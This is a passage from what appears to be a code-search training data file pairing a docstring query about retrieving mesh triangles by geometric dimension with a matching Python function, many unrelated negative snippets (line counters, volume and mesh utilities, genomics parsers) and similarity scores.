vacabulary_list.append(element)\r\n return len(vacabulary_list)", "def get_num_examples(path_in):\n i = 0\n with open(path_in, 'r', encoding='utf8') as f:\n for _ in f:\n i += 1\n return i", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def main() -> None:\n lines = Lines(sys.stdin.read().splitlines())\n print(count_containers(lines))", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def linesCountingAux(file_name, nProcesses):\r\n\r\n linesPerProcessesList = []\r\n\r\n with open(file_name, \"r\") as file:\r\n lineCounting = 0\r\n\r\n for line in file:\r\n lineCounting += 1 #discover the lines in the text file\r\n\r\n linesPerProcesses = lineCounting // nProcesses\r\n\r\n for number in range(nProcesses):\r\n linesPerProcessesList.append(linesPerProcesses)\r\n if sum(linesPerProcessesList) < lineCounting:\r\n for number in range (lineCounting - sum(linesPerProcessesList)):\r\n linesPerProcessesList[number] += 1\r\n\r\n return linesPerProcessesList", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def count_number_of_reads(filename: Path) -> int:\n\tif filename.suffix == '.gz':\n\t\tcommand = f\"zcat {filename}\"\n\telse:\n\t\tcommand = f\"cat {filename}\"\n\tprocess = subprocess.Popen(command.split(), stdout = subprocess.PIPE)\n\toutput = subprocess.check_output([\"wc\", \"-l\"], stdin = process.stdout)\n\n\treads = int(output.strip()) / 4\n\treturn int(reads)", "def numverts(self):\n return self._numvertstotal", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def count_data_items(fileids, train=True):\n sizes = 28000 if train else 22500\n return len(fileids) * sizes", "def get_num_of_images(self):", "def n_total_files(self):\n return len(self.fileinfo)", "def size_of_variable(self, variable):\n index_structures = variable.index_structures\n if not index_structures:\n return 1\n mapping = [self.mod_index[ind].mapping for ind in index_structures]\n blocking = [self.mod_index[ind].blocking for ind in index_structures]\n size = []\n for i in range(len(mapping)):\n if mapping[i] and blocking[i]:\n length = 0\n for blk in blocking[i]:\n if blk == 0:\n length += 1\n else:\n length += blk\n size.append(length)\n else:\n return None\n return size", "def _GetSurfaceHistoryFrequencies(logs_dir):\n surfaces_count = collections.defaultdict(int)\n if not logs_dir:\n return surfaces_count\n total = 0\n last_100_invocations = sorted(os.listdir(logs_dir), reverse=True)[:100]\n for filename in last_100_invocations:\n file_path = os.path.join(logs_dir, filename)\n with files.FileReader(file_path) as log_file:\n for line in log_file:\n match = re.search(log.USED_SURFACE_PATTERN, line)\n if match:\n surface = match.group(1)\n total += 1\n surfaces_count[surface] += 1\n # normalize surface frequencies\n return {surface: count / total\n for surface, count in six.iteritems(surfaces_count)}", "def totalfiles(self):\n return len([sz for sz in self.iterate()])", "def test_volume_3d(self):\n # generate voronoi mesh \n mesh = Mesh3d(self.particles, self.bound)\n print(\"building mesh...\")\n mesh.build_geometry()\n print(\"mesh complete\")\n\n # calculate voronoi volumes of all real particles \n real_indices = self.particles[\"tag\"] == ParticleTAGS.Real\n tot_vol = np.sum(self.particles[\"volume\"][real_indices])\n\n self.assertAlmostEqual(tot_vol, 1.0)", "def countgenes():\n directory = openfile('db_directory.txt')\n no_genes_file = directory+'GENES_IN_HPO.txt'\n GENES_IN_HPO = openfile(no_genes_file)\n #GENES_IN_HPO = openfile(numbergenes_file)\n return int(GENES_IN_HPO)", "def venn_order(input_files):\n\n return len(input_files)", "def get_number_of_measurement(self):\n used_fragments = set()\n counter = 0\n for fragment in self.observed_fragments:\n num_of_isotope = 0\n used_counter = 0\n for i in self.mdv[fragment]:\n num_of_isotope = num_of_isotope + 1\n if self.mdv[fragment][i]['use'] == 'use':\n\n counter = counter + 1\n used_counter = used_counter + 1\n if num_of_isotope == used_counter:\n used_fragments.add(fragment)\n return counter-len(used_fragments)", "def __number_of_files(self):\n self.__get_files()\n return len(self.files)", "def count_class(srcfile, listfile):\n cls_list = []\n\n # open the list file\n with open(listfile, 'r') as f:\n lines = f.readlines()\n\n # check each file in the list\n for line in lines:\n xml_file = srcfile.format(line.strip())\n\n tree = ET.parse(xml_file)\n\n # objs is all the objects in the xml\n objs = tree.findall('object')\n\n # find the class name in the object, and add it to the cls list\n for ix, obj in enumerate(objs):\n cls = str(obj.find('name').text)\n cls_list.append(cls)\n\n # find the keys and sort, count the number of boxes of the keys\n if len(cls_list) > 0:\n cls_list.sort()\n import numpy as np\n cls_arr = np.array(cls_list)\n cls1 = list(set(cls_list))\n print('unsort classes is:', cls1)\n cls1.sort()\n print('sorted classes is:', cls1)\n classes = np.unique(cls_arr)\n print('the class number is:', classes.shape[0])\n print('----------------------------')\n print('the number of each class:')\n for i in range(0, classes.shape[0]):\n # print(classes[i], cls_list.count(classes[i]))\n print(classes[i], ':', np.where(cls_arr==classes[i])[0].shape[0])\n print('----------------------------')\n\n print('the number of all the boxes is:', len(cls_list))\n return cls_list", "def getCountFiles():\n result = 0\n session = Queries.createSession()\n try:\n result = session.execute(func.count(FileTable.id)).fetchone()[0]\n except sqlalchemy.exc.ArgumentError:\n print 'SQLAlchemy ERROR: Invalid or conflicting function argument is supplied'\n except sqlalchemy.exc.CompileError:\n print 'SQLAlchemy ERROR: Error occurs during SQL compilation'\n finally:\n session.close()\n return result", "def get_rec_count(files: List[str],\n dialect: csv.Dialect) -> Tuple[Optional[int], int]:\n rec_cnt = -1\n for _ in csv.reader(fileinput.input(files), dialect):\n rec_cnt += 1\n fileinput.close()\n return rec_cnt", "def __get_files_row_count(self, region):\r\n \r\n count = 0\r\n for file in self.__files:\r\n file_to_parse = os.path.join(self.__folder, os.path.basename(file))\r\n with zipfile.ZipFile(file_to_parse, \"r\") as zf:\r\n with zf.open(self.__get_region_filename(region), 'r') as csv_file:\r\n reader = csv.reader(TextIOWrapper(csv_file, 'windows-1250'), delimiter=';', quotechar='\"')\r\n count += sum(1 for row in reader)\r\n return count", "def countLength():\n counter = 0\n\n with open('bc.processed3.csv', 'r') as openfile:\n for line in openfile:\n counter += 1\n if counter == 1:\n print line\n\n print('Length: ', counter)", "def _get_nparts(filename,headersize,itemsize):\n return (os.path.getsize(filename)-headersize)/itemsize", "def count():", "def find_dimesion(filename):\n file = open(filename,\"r\")\n\n line = file.readline()\n file.close()\n return len(line.split())", "def get_faces_nr(self):\r\n\r\n logger.debug('Getting number of faces in each frame')\r\n\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n\r\n if os.path.exists(self.track_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n logger.debug('Loading YAML file with tracking results')\r\n\r\n with open(self.track_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n logger.debug('YAML file with tracking results loaded')\r\n\r\n else:\r\n\r\n print 'Warning! No tracking results found!'\r\n logger.warning('No tracking results found!')\r\n\r\n return\r\n\r\n self.faces_nr = {}\r\n\r\n for segment_dict in self.tracked_faces:\r\n\r\n frame_list = segment_dict[c.FRAMES_KEY]\r\n\r\n for frame_dict in frame_list:\r\n\r\n frame_name = frame_dict[c.SAVED_FRAME_NAME_KEY]\r\n\r\n if frame_name in self.faces_nr:\r\n\r\n self.faces_nr[frame_name] += 1\r\n\r\n else:\r\n\r\n self.faces_nr[frame_name] = 1\r\n\r\n # Save YAML file\r\n\r\n utils.save_YAML_file(self.faces_nr_path, self.faces_nr)", "async def get_counts_for_file(\n file_name: str,\n score: int = 0,\n par_length: int = 0,\n co_occ: int = 0,\n limit_collection: List[str] = Query([]),\n):\n limitcollection_positive, limitcollection_negative = get_collection_files_regex(\n limit_collection, get_language_from_filename(file_name)\n )\n query_graph_result = get_db().AQLQuery(\n query=main_queries.QUERY_TOTAL_NUMBERS,\n batchSize=100000,\n bindVars={\n \"filename\": file_name,\n \"score\": score,\n \"parlength\": par_length,\n \"coocc\": co_occ,\n \"limitcollection_positive\": limitcollection_positive,\n \"limitcollection_negative\": limitcollection_negative,\n },\n )\n return {\"parallel_count\": query_graph_result.result[0]}", "def estimate_volume(self):\n volume = 0.\n zvals = np.unique([c.image_z_position for c in self.contours])\n\n # We pad a zval on the bottom that is the same distance from the\n # first zval to the second zval but below the first point. We do \n # the same thing for the top zval.\n if len(self.contours) != 1:\n zlow = zvals[ 0] - (zvals[1]-zvals[0])\n zhigh = zvals[-1] + (zvals[-1]-zvals[-2])\n zvals = np.r_[zlow, zvals, zhigh]\n else:\n zvals = None\n\n for i,contour in enumerate(self.contours):\n contour_array = contour.to_matrix() * self.scan.pixel_spacing\n x = contour_array[:,0]\n y = contour_array[:,1]\n # \"Shoelace\" formula for area.\n area = 0.5*np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1)))\n \n if zvals is not None:\n j = np.argmin(np.abs(contour.image_z_position-zvals))\n spacing_z = 0.5*(zvals[j+1]-zvals[j-1])\n else:\n spacing_z = self.scan.slice_thickness\n\n volume += (1. if contour.inclusion else -1.) * area * spacing_z\n return volume", "def count_examples(filepaths):\n n = 0\n for f in filepaths:\n for r in tf.python_io.tf_record_iterator(f):\n n += 1\n return n", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def approximate_volume(pdb_filenames, n_molecules_list, box_scaleup_factor=2.0):\n volume = 0.0 # in cubic angstroms\n for k, (pdb_file) in enumerate(pdb_filenames):\n molecule_volume = 0.0\n molecule_trj = md.load(pdb_filenames[k])\n for atom in molecule_trj.topology.atoms:\n if atom.element.symbol == 'H':\n molecule_volume += 5.0 # approximated from bondi radius = 1.06 angstroms\n else:\n molecule_volume += 15.0 # approximated from bondi radius of carbon = 1.53 angstroms\n volume += molecule_volume * n_molecules_list[k]\n box_size = volume**(1.0/3.0) * box_scaleup_factor\n return box_size", "def pre_process_file(filename):\n\n num_lines = 0\n vm_ids = set()\n with open(filename) as trace:\n for item in csv.reader(trace, delimiter=','):\n num_lines += 1\n disk_id = int(item[2])\n vm_ids.add(disk_id) # can make it more efficient\n no_of_vms = len(vm_ids)\n return (num_lines, no_of_vms, vm_ids)", "def get_triangles_per_surface(my_core, entity_ranges):\n\n t_p_s = {}\n for surface in entity_ranges['Surfaces']:\n t_p_s[surface] = my_core.get_entities_by_type(\n surface, types.MBTRI).size()\n return t_p_s", "def count_data(path):\n matcher = re.compile(r'[0-9]+\\.json')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data", "def length(analog_file):\n if analog_file[-10:] == 'analog.brw':\n with h5py.File(analog_file, 'r') as file:\n print(len(file[\"3BData\"][\"Raw\"]))\n else:\n raise NotImplementedError(\"Only for use with *analog.brw files\")", "def findFLength(filename):\n f = os.popen('wc -l < {}'.format(filename))\n return int(f.read())", "def load_nifty_volume_as_array(filename):\n img = sitk.ReadImage(filename)\n img_arr = sitk.GetArrayFromImage(img)\n return img_arr", "def contig_count(contig):\n return sum([1 for line in open(contig, 'rU').readlines() if line.startswith('>')])", "def _setup_n_ints_in_file(self):\n self.n_ints_in_file = sigproc.calc_n_ints_in_file(self.filename)", "def n_facets(self):\n return self.n_inequalities()", "def get_inf_sizes(song_or_key):\n if isinstance(song_or_key, basestring):\n k = song_or_key\n else:\n k = song_key(song_or_key)\n path = os.path.join(LYRICS_DIR, k+'.txt.gz.infgen')\n with open(path) as f:\n return parse_infgen.parse_ratio(f)", "def countComponents26(cube):\n n,l = labelComponents26(cube);\n return n;", "def _calculate_volume(image: sitk.Image) -> float:\n\n voxel_volume = np.prod(image.GetSpacing())\n number_of_voxels = sitk.GetArrayFromImage(image).sum()\n\n return number_of_voxels * voxel_volume", "def get_col_count(files: List[str],\n dialect: csv.Dialect) -> int:\n for record in csv.reader(fileinput.input(files[0]), dialect):\n field_cnt = len(record) -1\n break\n fileinput.close()\n return field_cnt", "def num_cuboids(self):\n return self._shape_count(_sff.cuboid)", "def volume_polyhedron(polyhedron):\n V = 0\n for fkey in polyhedron.face:\n vertices = polyhedron.face_vertices(fkey, ordered=True)\n if len(vertices) == 3:\n faces = [vertices]\n else:\n faces = []\n for i in range(1, len(vertices) - 1):\n faces.append(vertices[0:1] + vertices[i:i + 2])\n for face in faces:\n a = polyhedron.vertex_coordinates(face[0])\n b = polyhedron.vertex_coordinates(face[1])\n c = polyhedron.vertex_coordinates(face[2])\n ab = subtract_vectors(b, a)\n ac = subtract_vectors(c, a)\n n = cross_vectors(ab, ac)\n V += dot_vectors(a, n)\n return V / 6.", "def surface_samples(self):\n if self._surface_samples is None:\n self._surface_samples = self.get_surface_samples(10000)\n return self._surface_samples", "def calHet( inFile, varType ):\n names = []\n print(\"Sample\\tfracHet\\thetCt\\thomCt\") # print header\n \n with open( inFile, 'r') as files: # open sample name file\n for i in files:\n i = i.rstrip()\n vcf = i + \".\" + varType + \".vcf\" \n with open( vcf, 'r' ) as data:\n hom = 0.0 # count homozygous sites\n het = 0.0 # count heterozygous sites\n fractionHet = 0.0 # fraction heterozygous\n \n for var in data:\n if var.startswith(\"#\"): # skip header\n continue\n else: \n var = var.rstrip()\n line = var.split(\"\\t\")\n stats = line[9].split(':') # \n alleles = list( map( int, stats[1].split(',') ) ) # create list of allele counts\n check = [ i for i in alleles if i > 0] # put any counts > 0 into a list\n if not check: # if all allele counts == 0\n continue # all alleles are set to zero wtf? Result of a quality score that is low.\n elif len(check) > 1: # multiple allele counts , must be heterozygous\n het += 1 # more than one allele \n elif len(check) == 1: # only one allele has a count\n hom += 1\n #print(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\" %(i, line[0], line[1], stats[0], stats[1], check ) ) \n if hom == 0:\n fractionHet = 100\n else:\n fractionHet = het/(hom + het) # calculate fraction heterozygous\n print(\"%s\\t%f\\t%f\\t%f\" %(i, fractionHet, het,hom )) \n \n files.close()", "def dimensions():", "def process_spacecraft(spacecraft_file_abspath):\n\n total_fuel = 0\n with open(spacecraft_file_abspath, 'r') as f:\n for mass in f.readlines():\n total_fuel += process_module_mass(int(mass))\n\n return total_fuel", "def get_file_counts(filename):\n new_file = open(filename, \"r\")\n d = dict()\n for line in new_file: \n split_line = line.split()\n for word in split_line:\n if word in d:\n d[word] += 1\n else:\n d[word] = 1\n new_file.close()\n return d", "def count_variants(vcf_list, sample_list):\n\n df_lst = []\n\n sample_vcf_dct = dict(zip(sample_list,vcf_list))\n\n for s in sample_vcf_dct.keys():\n\n vcf_in = sample_vcf_dct[s]\n vcf = VariantFile(vcf_in)\n\n snv = 0\n indel = 0\n\n for rec in vcf:\n\n ref_len = len(rec.ref)\n\n for a in rec.alts:\n if len(a) > 1 or ref_len > 1:\n indel +=1\n else:\n snv +=1\n\n df_lst.append([s,snv,indel])\n\n out_df = pd.DataFrame(df_lst, columns=['sample','snvs','indels'])\n\n return out_df" ]
[ "0.62458247", "0.6179542", "0.61321104", "0.59735066", "0.5963068", "0.5940635", "0.5933851", "0.58621955", "0.5853695", "0.58389825", "0.5696593", "0.569234", "0.56829655", "0.5678511", "0.56699306", "0.5660936", "0.5654335", "0.5653217", "0.5644729", "0.56445545", "0.5624782", "0.56085867", "0.56084555", "0.5599541", "0.5564642", "0.55617267", "0.55422044", "0.55343777", "0.5524653", "0.5520196", "0.551315", "0.55068284", "0.55026144", "0.5486285", "0.5482118", "0.5459388", "0.545895", "0.5457493", "0.5451079", "0.54353434", "0.5433203", "0.5432739", "0.5421109", "0.5421109", "0.5399715", "0.5379659", "0.5377716", "0.5376754", "0.53606784", "0.53570503", "0.5342393", "0.53378296", "0.5327593", "0.5320841", "0.53202665", "0.5314768", "0.531239", "0.5311997", "0.5308972", "0.5304375", "0.53042835", "0.53027344", "0.52854335", "0.5284771", "0.5262586", "0.5261372", "0.5259589", "0.52540535", "0.52510387", "0.5243612", "0.5242551", "0.5231812", "0.5227791", "0.5219812", "0.5218493", "0.5211845", "0.52090347", "0.5206607", "0.51979345", "0.51968616", "0.51930004", "0.51918036", "0.51873386", "0.51835054", "0.5181803", "0.5181445", "0.51804566", "0.5179529", "0.5179037", "0.517786", "0.5176554", "0.5175884", "0.5174625", "0.51714164", "0.51709944", "0.5165327", "0.5163799", "0.51616555", "0.5154753", "0.51538765" ]
0.613363
2
Get triangles of a volume if geom_dim is 3 Get triangles of a surface if geom_dim is 2 Else get all the triangles inputs
def get_tris(my_core, meshset, geom_dim): # get triangles of a volume if my_core.tag_get_data(geom_dim, meshset)[0][0] == 3: entities = my_core.create_meshset() for surface in my_core.get_child_meshsets(meshset): my_core.add_entities(entities, my_core.get_entities_by_type(surface, types.MBTRI)) tris = my_core.get_entities_by_type(entities, types.MBTRI) # get triangles of a surface elif my_core.tag_get_data(geom_dim, meshset)[0][0] == 2: entities = my_core.create_meshset() my_core.add_entities(entities, my_core.get_entities_by_type(meshset, types.MBTRI)) tris = my_core.get_entities_by_type(entities, types.MBTRI) else: # get all the triangles tris = my_core.get_entities_by_type(meshset, types.MBTRI) return tris
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def split_triangles(mesh):\n triangles = np.asarray(mesh.triangles).copy()\n vertices = np.asarray(mesh.vertices).copy()\n\n triangles_3 = np.zeros_like(triangles)\n vertices_3 = np.zeros((len(triangles) * 3, 3), dtype=vertices.dtype)\n\n for index_triangle, t in enumerate(triangles):\n index_vertex = index_triangle * 3\n vertices_3[index_vertex] = vertices[t[0]]\n vertices_3[index_vertex + 1] = vertices[t[1]]\n vertices_3[index_vertex + 2] = vertices[t[2]]\n\n triangles_3[index_triangle] = np.arange(index_vertex, index_vertex + 3)\n\n mesh_return = deepcopy(mesh)\n mesh_return.triangles = o3d.utility.Vector3iVector(triangles_3)\n mesh_return.vertices = o3d.utility.Vector3dVector(vertices_3)\n mesh_return.triangle_normals = mesh.triangle_normals\n mesh_return.paint_uniform_color([0.5, 0.5, 0.5])\n return mesh_return", "def extract_triangles(mesh, materials_list):\n tri_list = []\n do_uv = bool(mesh.tessface_uv_textures)\n\n for mat in materials_list:\n for i, face in enumerate(mesh.tessfaces):\n f_v = face.vertices\n if mesh.materials[face.material_index].name != mat: continue\n\n uf = mesh.tessface_uv_textures.active.data[i] if do_uv else None\n\n fmt = 0\n if(do_uv): fmt = face.material_index\n\n if do_uv:\n f_uv = uf.uv\n\n if len(f_v) == 3:\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n else: new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n tri_list.append(new_tri)\n\n else: # it's a quad\n new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), fmt)\n new_tri_2 = tri_wrapper((f_v[0], f_v[2], f_v[3]), fmt)\n\n if (do_uv):\n new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])\n new_tri_2.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[2]), uv_key(f_uv[3])\n else:\n new_tri.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n new_tri_2.faceuvs = uv_key((0.0,0.0)), uv_key((1.0,0.0)), uv_key((0.0,1.0))\n\n tri_list.append(new_tri)\n tri_list.append(new_tri_2)\n\n return tri_list", "def get_triangles_per_surface(my_core, entity_ranges):\n\n t_p_s = {}\n for surface in entity_ranges['Surfaces']:\n t_p_s[surface] = my_core.get_entities_by_type(\n surface, types.MBTRI).size()\n return t_p_s", "def get_triangles(self):\n location = TopLoc_Location()\n bt = BRep_Tool()\n facing = bt.Triangulation(self.topods_shape(), location)\n if facing == None:\n return [], []\n\n tab = facing.Nodes()\n tri = facing.Triangles()\n verts = []\n for i in range(1, facing.NbNodes() + 1):\n p = tab.Value(i).Transformed(location.Transformation())\n verts.append(np.array(list(p.Coord())))\n\n tris = []\n reversed = self.reversed()\n for i in range(1, facing.NbTriangles() + 1):\n # OCC triangle normals point in the surface normal\n # direction\n if reversed:\n index1, index3, index2 = tri.Value(i).Get()\n else:\n index1, index2, index3 = tri.Value(i).Get()\n\n tris.append([index1 - 1, index2 - 1, index3 - 1])\n\n return np.asarray(verts, dtype=np.float32), np.asarray(tris, dtype=np.int32)", "def exportTriangles(self):\n # Filter out triangles with any vertex in the extended BBox\n return [(a-4,b-4,c-4)\n for (a,b,c) in self.triangles if a > 3 and b > 3 and c > 3]", "def exportTriangles(self):\n # Filter out triangles with any vertex in the extended BBox\n return [(a-4, b-4, c-4)\n for (a, b, c) in self.triangles if a > 3 and b > 3 and c > 3]", "def plot3surface( pot, **kwargs ): \n \n fig = plt.figure( figsize = (8., 8.) ) \n gs = matplotlib.gridspec.GridSpec( 3,2, wspace=0.2) \n \n # Make a list with three perpendicular directions which \n # will define the three surface cuts \n perp = [(np.pi/2., 0.), (np.pi/2., -np.pi/2.), (0., -1.*np.pi/2.) ]\n \n # Iterate to plot the three surface cuts\n yMin = 1e16\n yMax = -1e16 \n Ims = []\n for i in range(3):\n ax0 = fig.add_subplot( gs[i,0], projection='3d')\n ax1 = fig.add_subplot( gs[i,1]) \n \n T0, T1, X, Y, Z = surfcut_points( normal = perp[i], \\\n ax0=ax0, **kwargs ) \n \n EVAL = pot.evalpotential(X,Y,Z)\n im = ax1.pcolormesh( T0, T1, EVAL, \\\n cmap=plt.get_cmap('jet') ) \n plt.axes( ax1 ) \n cbar = plt.colorbar(im)\n cbar.set_label( pot.unitlabel, rotation=0) \n \n ymin = EVAL.min()\n ymax = EVAL.max()\n \n Ims.append(im) \n if ymin < yMin : yMin = ymin\n if ymax > yMax : yMax = ymax \n \n for im in Ims:\n im.set_clim( vmin=yMin, vmax=yMax)", "def trimesh_from_point_cloud(cloud):\n points = np.asarray(cloud)\n hull = scipy.spatial.ConvexHull(points)\n hull = scipy.spatial.ConvexHull(points[hull.vertices])\n ru.transforms.counterclockwise_hull(hull)\n vertices = hull.points\n faces = hull.simplices\n return vertices, faces", "def compute_geom_weights(self):\n weights = np.zeros([np.size(self._triangles, 0), 3])\n tris_pts = self._tris_pts\n for ipt in range(3):\n p0 = tris_pts[:, (ipt) % 3, :]\n p1 = tris_pts[:, (ipt+1) % 3, :]\n p2 = tris_pts[:, (ipt-1) % 3, :]\n alpha1 = np.arctan2(p1[:, 1]-p0[:, 1], p1[:, 0]-p0[:, 0])\n alpha2 = np.arctan2(p2[:, 1]-p0[:, 1], p2[:, 0]-p0[:, 0])\n # In the below formula we could take modulo 2. but\n # modulo 1. is safer regarding round-off errors (flat triangles).\n angle = np.abs(np.mod((alpha2-alpha1) / np.pi, 1.))\n # Weight proportional to angle up np.pi/2 ; null weight for\n # degenerated cases 0. and np.pi (Note that `angle` is normalized\n # by np.pi)\n weights[:, ipt] = 0.5 - np.abs(angle-0.5)\n return weights", "def get_surface_facets(self):\n self.setup_connectivity(self.tdim - 1, self.tdim)\n conn = self.get_conn(self.tdim - 1, self.tdim)\n\n ii = np.where(np.diff(conn.offsets) == 1)[0]\n\n return ii.astype(np.uint32)", "def triangle_facets(length=2.0, divisions=4):\n\n # Starting with a equilateral triangle.\n vertices = [\n (0, (math.sqrt(3) / 3.0) * length, 0.0),\n (-length / 2, -(math.sqrt(3) / 6.0) * length, 0.0),\n (length / 2, -(math.sqrt(3) / 6.0) * length, 0.0),\n ]\n\n # The facets should not be accumulated for all of them as the first\n # triangle will Z-fight with remaining triangles. The overall style is to\n # have 'holes' where there are triangles that aren't filled.\n\n facets = [(0, 1, 2)]\n new_triangles = facets\n\n for _ in range(divisions):\n facets = []\n for new_triangle in new_triangles:\n next_vertices, next_triangles = _divide(new_triangle, vertices)\n vertices.extend(next_vertices)\n facets.extend(next_triangles)\n\n new_triangles = facets\n\n return vertices, facets", "def _get_surfaces(idf):\n surfaces = idf.getsurfaces() + idf.getshadingsurfaces() + idf.getsubsurfaces()\n return surfaces", "def test_volume_3d(self):\n # generate voronoi mesh \n mesh = Mesh3d(self.particles, self.bound)\n print(\"building mesh...\")\n mesh.build_geometry()\n print(\"mesh complete\")\n\n # calculate voronoi volumes of all real particles \n real_indices = self.particles[\"tag\"] == ParticleTAGS.Real\n tot_vol = np.sum(self.particles[\"volume\"][real_indices])\n\n self.assertAlmostEqual(tot_vol, 1.0)", "def surface(func, umin=0, umax=2*np.pi, ucount=64, urepeat=1.0,\n vmin=0, vmax=2*np.pi, vcount=64, vrepeat=1.0):\n\n vtype = [('position', np.float32, 3),\n ('texcoord', np.float32, 2),\n ('normal', np.float32, 3)]\n itype = np.uint32\n\n # umin, umax, ucount = 0, 2*np.pi, 64\n # vmin, vmax, vcount = 0, 2*np.pi, 64\n\n vcount += 1\n ucount += 1\n n = vcount*ucount\n\n Un = np.repeat(np.linspace(0, 1, ucount, endpoint=True), vcount)\n Vn = np.tile (np.linspace(0, 1, vcount, endpoint=True), ucount)\n U = umin+Un*(umax-umin)\n V = vmin+Vn*(vmax-vmin)\n\n vertices = np.zeros(n, dtype=vtype)\n for i,(u,v) in enumerate(zip(U,V)):\n vertices[\"position\"][i] = func(u,v)\n\n vertices[\"texcoord\"][:,0] = Un*urepeat\n vertices[\"texcoord\"][:,1] = Vn*vrepeat\n\n indices = []\n for i in range(ucount-1):\n for j in range(vcount-1):\n indices.append(i*(vcount) + j )\n indices.append(i*(vcount) + j+1 )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j+vcount )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j )\n indices = np.array(indices, dtype=itype)\n vertices[\"normal\"] = normals(vertices[\"position\"],\n indices.reshape(len(indices)//3,3))\n\n return vertices.view(gloo.VertexBuffer), indices.view(gloo.IndexBuffer)", "def depthFaceSelect(self, triangleSelected,depth, materials):\t\n\t\tlayersR = list()\n\t\tlayersG = list()\n\t\tlayersB = list()\n\t\t\n\t\tlayerMaterial = list()\n\t\tself.volumeComposition = list()\n\t\tfor l in range(len(materials)):\n\t\t\tlayerMaterial.append(list())\n\t\t\tself.volumeComposition.append(list())\n\t\t\n\t\tvolumeGeneral = list()\n\t\tself.boolLayers = []\n\t\t\n\t\tfor i in self.slicePoints:\n\t\t\tboolResult2 = self.voxel_slice(i, self.vertices, self.triangles, self.res, self.llc, self.sliceProto, 2)\n\t\t\tprint boolResult2.shape\n\t\t\ttupleResultR = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultG = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultB = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleMaterial = list()\n\t\t\tfor l in range(len(materials)):\n\t\t\t\ttupleMaterial.append(numpy.zeros(boolResult2.shape, dtype=float))\n\t\t\t#tupleMaterial = numpy.zeros(boolResult2.shape, dtype=f)\n\t\t\t#lines=self.findSelectedContour(self.vertices,triangleSelected,i ,numpy.array([0,0,1]))\n\t\t\t#boolResult1 = self.findVoxelOfSelectedContour(i, lines, self.res, self.llc, self.sliceProto, depth)\n\t\t\tj = numpy.nditer(boolResult2, flags=['multi_index'], op_flags=['readwrite'])\n\n\t\t\twhile not j.finished:\t\n\t\t\t\tprint type(j.multi_index)\n\t\t\t\tprint j.multi_index\n\t\t\t\tif j[0] == True:\n\t\t\t\t\ttupleResultB[j.multi_index] = materials[0][0]\n\t\t\t\t\ttupleResultG[j.multi_index] = materials[0][1]\n\t\t\t\t\ttupleResultR[j.multi_index] = materials[0][2]\n\t\t\t\t\ttupleMaterial[0][j.multi_index] = 1.0 \n\t\t\t\telse:\n\t\t\t\t\ttupleResultB[j.multi_index] = 0\n\t\t\t\t\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\ttupleResultR[j.multi_index] = 0\n\t\t\t\tj.iternext()\t\t\t\t\n\t\t\t\t\t\n\t\t\tfor k in range(len(triangleSelected)):\n\t\t\t\tboolResult1 = self.findVoxelOfSelectedContour(i, self.vertices, triangleSelected[k], self.res, self.llc, self.sliceProto, depth[k])\n\t\t\t\tboolResult = numpy.logical_and(boolResult1, boolResult2)\n\t\t\t\tprint boolResult.shape\n\n\t\t\t\tj = numpy.nditer(boolResult2, flags=['multi_index'], op_flags=['readwrite'])\n\t\t\t\twhile not j.finished:\n\t\t\t\t\tif j[0] == True:\n\t\t\t\t\t\tif boolResult[j.multi_index] == True:\n\t\t\t\t\t\t\ttupleResultB[j.multi_index] = materials[k + 1][0]\n\t\t\t\t\t\t\ttupleResultG[j.multi_index] = materials[k + 1][1]\n\t\t\t\t\t\t\ttupleResultR[j.multi_index] = materials[k + 1][2]\n\t\t\t\t\t\t\ttupleMaterial[k + 1][j.multi_index] = 1.0 \n\t\t\t\t\t\t\ttupleMaterial[0][j.multi_index] = 0.0\n\t\t\t\t\t\t#else:\n\t\t\t\t\t\t#\ttupleResultB[j.multi_index] = 255\n\t\t\t\t\t\t#\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\t\t#\ttupleResultR[j.multi_index] = 